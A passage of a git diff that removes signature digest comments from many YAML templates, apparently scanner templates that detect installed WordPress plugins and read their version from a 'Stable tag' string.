b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096a71ad4e3e492659e43041b18afddac5ddbad79a8493b0405e91c52c56451af022100b091ad0197615ecba75e6b48ad26e13856c848036a5f67d58826f1079918ed1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 9e675fa3d3..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022e1ffb84491b942ee249bf448a3afc223ca0a0b6ee4afe3b9e199aa7602d31a022043490048ab0a29703bb009dd0b03b6be1efd946e9716089ce8ed7e6a50a89bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 0e25172fac..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100edfcfe316f6d373367db1eac1fdf922809de78cecdf041f95fbb21c7ba529032022100b6e9bea0b1c48ac1c2ff30431819f805843887ad14116d67d08b1d892bea6e58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 2329d9e3a6..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204eb1e1f4d17d9935e5ba9b34999417169454bd144e4f657eaafe20b102aaf1b2022100ef241250a8fc8f51a922c360b8875d3c15e9d62c1b8b41fc0e53a0c9bc9fb129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 1ba2da6b13..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c850a28d368660d508b3c4a221511d67fcae8d17ac4c74c3ffa781f6748777e022100ebbde60bde0c6e2711608d27561a4602097c461e416c0254829b3ac7691a3ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 3ef8db90fd..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2e52cb040ff0c4bf57a523e6808f7aa8ae673fad5176068b58ef4824b820e0b02205d0f1932cc31ff4c2dcfb3c1256746d9bfb370610601d023b2c40df8b23574d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index fb617fc5cd..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dea8294777993b79960dc9f06d2109304fbccb81f8d97daaa8a8d25236816f6102206170fe2e11c1e224e57bc6e4e18ad5593f8689d3b470e979df1f0a89804550e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index e8073dae96..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220712b33476093d4cd01cb94591b9d3a79c7955a85c5ad98e664aae5d98d076fbc02210092b89ded3232d7e015c1a8c7c51dcab74dda61b8758f2e70fed6a1e5f3e5345d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 2829bf0e5c..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010c21c06ed53de4529e07d3a6f40e330ddeb77d73e2a9b0409679f97eb07f701022100a0f6a611794f9febf636652f2fe91de20b9f36048ed802f5706a8d8556e9a884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d54d37c4ff..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e0856658fc34726ffd83ad6b4f02bf784cae9105fcff56e7421715109e22c04022018dd6b734362870f89b45f00458b4bfb9045f699e9ec32ea555b973b0d3dbb00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index c45a4417c2..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220733c02469df710216afeeb66adb30dd54c38b8d6921b2f01d68f2d57be4c45e4022100df4dede120980a539cf5973307378142fa0e8367aa5d194437f6c7f4d73c1296:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 334a775f33..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc91eba7367d3610f5618b29703dcd4b9ffca887241cf0c122dd23daa1656731022100de89a6675a3750b2c2f80ae928efaa895b7e07001ddae38800811e8006bbc64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index aed1e1c9e9..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220418a5da4e5a6087fb0a80de83a96cf4b3d445711306faa5222b68e23c785a7aa02205da4fa6752e939e431f305ec8d412fa1ca747cef217870f8835d983d7b719f20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index e7cc5308ff..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053e56405d492fa62301ad6b229c5fc9922358486962f8f4e3d6243544c32c61c02205e294199d9ca5a4b39dce00b61ce91035360dfd4d8295696bd12d0deaf2c4d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 95febf6fc5..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204750df9d9dafc49d9ef22eb2de49395a65a820521fedb4b3ab24f74b7732ba6202207a9ca548a5eb17ff849324256a3c9b9de7a253e038a4cad413a5fb225a4e8411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 8d53faecec..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002ba06d8cd6d3de119c622c98a3cbfd8ffff53f5c5eea6217c621fd12abda694022100981d8ef91a9560b6a4784462386732e8d8ac24d0d7451a5095c627fc3c8eedc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 532112c460..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067eaa168ef0769c7276cd1f5444ff02eaca75617502e3dc2f4b1b0d1d3d0473e02206dd27aa92c389725c982f6ba4c27e44dcf60220c4d115f0ce3b382a473770cad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 25a297afc2..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ea5b7be1198da6fc8f8c37eaee8d9a4141a7aa2c8f27720e1c0186b6c3e493b022005aa38023aafa8fbd28c03a5be5dd650d78adeec5bf696e71843bf132b702673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 4b1de16aac..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206ec2e8dded94fabbfc0245db786d7f942b11d86bf6b1392f587fc712740d202b022058c6f798f6e8f4a1ca5e584b564552682e5b23ed4599a98db6267659a3ac53e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 54f726f6ff..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba85db9c7dfd688618d82716637d2dcd326bcaba8146635a15f2c968e5b33195022100fee5bc1b0d7b3acc89511a8a5e5f288c09cfebe28838c5fd55346aecdfb8b2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1dc9c912c7..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef1a98bca9c5ae6d2a2bbf5ec64f2c361fa8127da32ac2209bfb936d56dbfe25022100ab3b78ebf7fb6c5f543db5c0147188ae6106560352059d64900da5dcf86df2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index fe6a33a0e0..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202dc82e319c52575e12ecb61e6f4c4e041b17323f9d3454c0f0c88b1ad67ab2ef02210084e16e1689b269cb71bae7cd63b9f186c69c8fa4cf749c9102bc5cf8c4646b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index df8d7f395d..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053d87a2f96331c6dfeebac532e0419652dc52f0000a983b806e82719293f632702207b732dae4f2467359cf190fabf969a6bfadceaea5a9756b16f28a0de399080c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index d42ad8eab2..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e79ddd89c1dda5802ea07ed927878df1c5f5e4f4f903d71d38ffc0a75e8f5eb7022020dfffdb042a1dc6a746db16d951f009a4eb4118fdbb9925587db0bea1608cd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 65939ddd70..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087bf45d9f08c88a823a1ddb7d53e247ba43c1f122980ea94ecdbac0d229a290b02202013bf3cb2a8191a1f2706ffb83856dab8541f3b1051d7f2e2449d4694055cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index cae5a03713..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207b52fe2395314aa05e2f0f3dfaa329e0090cfee928ce96534b5a8c108c0da8060221009934f4ced7f835b1b4f05af8f81271cad70b72d74d8f9ada92354d239e4499a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 11a2dcde41..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062e94de123bdffeebf27e2916a77e7cea38a39cf86b18bf20ee58c5c8613219d02202fcbcbb608c978eafd6c3f741b322eca3eb5f1a9f5ac3869f8c6fa55f7e6e263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 1f085f1c88..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e25328f33a9b54d8ec99e75104a60206450577be6c8d7ced464a24dffc578740220544b0e791677ae17fc3ef3bdda8b1f803d6a5e79e98f95f6e01a36078901b9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 9c21eb26d4..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e8efb0a48f7383cf931b1899df155f7052fc374c74bcba97e2219619ad4acc6022079bd5372677010f850bc6be7b685d65645ef32e8fb8fa74eab176fbd2ccb397b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index f170d1391e..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c3c1d81cd307131714deee936111a301d06b49ca666d4fc27974f9521a7b1e402210093caa1d58caf3fcfd733fa7bdf8df8d8cf47ae3563f7c5968818d637d856847a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7bcae4c31c..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220796cce5f30a46b7aa0aca457335d22b01fcf8af144dd42742d2b3c415f86527402210083bfdfbc1619eeb094103a449694561245ad9123f4d66d31bd3f9dbf80a9f7c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 3e2fee15b0..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009226f36604cbe7840a80c179a7dac97e46ee305603386cf53da4925f5cd6731302203f7a26c1aaba1fb32a7cc4eb5502a278e79b8603f0bedc01c46161f12a0f18ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 664daa09da..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c27cdf14f5aa58144be06d91f8f1da7e881858bcf0d59c011037bd315097bb202201ef9580e66602e3f236b5d0bd333f2a3cce69263a946510c5571029ea475b77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index e08a2883c2..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100caeba3b0e21fc0f1f8684378b76bcab65300f504dd8350ef34cdf40a035d4d3f0220048b4c1c20ae626093750c9101482e397ce70da9a79dc066db080e6c5d4c6197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 76192a7449..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7282986778630ee702c52394c555110e1b0ad57c0d46cbb66c2c95aa5ed1802022100f66ada482f7cfafe8c060e116b3f66cc5538b6ae4e88d51ce85da70300f7cdc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index d5a92ff4d1..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1170266c30778f70383b6664075b822b69332db78df9e5ba244569bd64ffa660220198c138e72e336beb5337610aac1d6fab8126dc5d5d93bab8cbf6c8d844700cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 2dd2364540..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe67abbeb4e2b1d58a606c2db3688f2999bc7a5f1d2f8e6502ba6a49bcef67d30220591a4b431aa568b6e5198a4601e8e799e9038b20a41ab0d1ef00cfca68fa4d8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index affd6b1a22..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022067c54eabf53d5ae9845e972c229913947c9bb0fdcafe6307a4db66268430dc6d022100bc2fe3fb52750f1d122294096ec3c96233f1f0fd76660367d07143cd862e114f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 458d2f373b..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd02697d33c888ff67211d087c0e5c40803985a073c63b5346d36352d47b3448022100d39ee56186265b01ae2215e037c78ff99bb16f74a53be300ef41c900124b6b55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 50a945354b..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba67236669fbcf04134e504e2cd0b56e545323f09be7def392034971e0ff2de50221008de42c3e547d6a58dfd0d33b9036ca8d2deb1cce6d740643fba7753e25255f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 7f26aa24c2..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220011a5aba8b1b4608644074331cc40d21aac9156745efd0f0cbadfcb315b73c38022100ae72a0b37b7d0616fd62898df1815459657dec470e555172055b4cf39b6ce58e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 85b09f7e64..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220769dbda86c0dfe33f123b4aa4a217017276d8996b2f420a317852999bf2a10b4022100f13b2b54cf62d11da8626430f963280f0b57f3b147e05aa142dd132034354937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index b4452138ef..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220607220b08c55cd5ab9be05ae892123d251ba7686ad1fd45c7ba9f92aae0fa29102203ea03318e1511311f39946aaffac1cf8b9b765ef55f545b8bbdecfdfb18a8e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 366e5b3b12..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202c1bda5b8c4653c82f808d30df805e24d92c4d450ad2bbee8392c92b81a3d62e022053d137c58b60b489f3b67467909611ef55a17ae01002bf03492facbb5aa7e531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 1a95913258..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006152f8d9c965d5a15f2c108e16c0b8177a786c76c7bda9bb8292bc2ee557c43022100e09c43b57ea5b0ea53d51e2cd9f55514f054ae32a23467d3e5948597a4dbecb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 9f881002bf..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c1cfe7cf9820dc620b92af9af2f0a66b42dee598debc35ed85dae787edefa52022051c5bc2a778f857041ddb456c26d9cd318ad865925409d7952b59e95b2dfec82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 12189590b7..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049bfd826ba4faf874c3670db23e6aa7d99354e4428b54a2ee912c3f754e6c63302201154b72f12398aab00cac20ba54b0ea401bade6cf10199fe3a9a12146120ed8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml 